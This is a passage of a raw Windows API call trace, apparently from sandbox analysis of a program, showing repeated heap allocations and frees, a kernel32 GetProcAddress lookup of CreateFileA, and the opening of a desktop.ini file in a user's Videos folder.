lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0193.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0193.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0193.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0193.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0193.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0193.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0193.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0193.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0193.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0193.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0193.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0193.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0193.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0193.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0193.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0193.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0193.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0193.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0193.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0193.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0193.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0193.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0193.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0193.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0193.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0193.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0193.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0193.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0193.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0193.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0193.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0193.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0193.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0193.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0193.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0193.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0193.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0193.021] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0193.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0193.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0193.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0193.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0193.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0193.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0193.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0193.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0193.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0193.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0193.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0193.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0193.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0193.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0193.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0193.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0193.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0193.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0193.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0193.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0193.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0193.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0193.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0193.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0193.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0193.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0193.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0193.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0193.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0193.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0193.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0193.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0193.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0193.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0193.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0193.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0193.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0193.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0193.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0193.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0193.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0193.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0193.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0193.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0193.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0193.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0193.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0193.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0193.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0193.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0193.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0193.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0193.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0193.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0193.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0193.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0193.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0193.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0193.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0193.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0193.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0193.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0193.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0193.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0193.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0193.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0193.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0193.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0193.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0193.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0193.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0193.024] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0193.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0193.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0193.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0193.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba0f0 [0193.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba0f0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0193.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0193.025] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0193.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0193.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0193.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0193.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0193.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0193.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0193.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0193.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0f0 [0193.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba0f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0193.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0193.026] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0193.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0193.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0193.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0193.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0193.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0193.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0193.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0193.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0193.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0193.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0193.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0193.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0193.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0193.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0193.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x31) returned 0x90ad98 [0193.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini", cchWideChar=49, lpMultiByteStr=0x90ad98, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini", lpUsedDefaultChar=0x0) returned 49 [0193.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0193.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0193.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0193.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0193.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0193.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0193.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0193.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0193.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0193.027] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0193.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0193.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0193.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0193.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0193.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0193.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0193.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0193.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0193.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0193.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0193.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0193.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0193.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0193.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0193.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=49, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0193.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x62) returned 0x8e8320 [0193.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=49, lpWideCharStr=0x8e8320, cchWideChar=49 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned 49 [0193.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0193.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0193.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8320 | out: hHeap=0x8a0000) returned 1 [0193.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0193.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0193.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0193.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0193.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0193.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0193.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0193.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0193.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0193.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0193.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0193.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0193.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0193.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0193.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0193.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0193.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0193.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0193.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0193.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0193.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0193.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0193.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0193.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0193.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0193.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0193.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0193.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0193.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0193.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0193.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0193.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0193.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0193.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0193.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0193.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0193.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0193.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0193.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0193.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0193.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0193.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0193.031] FreeLibrary (hLibModule=0x75990000) returned 1 [0193.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x8a0000, 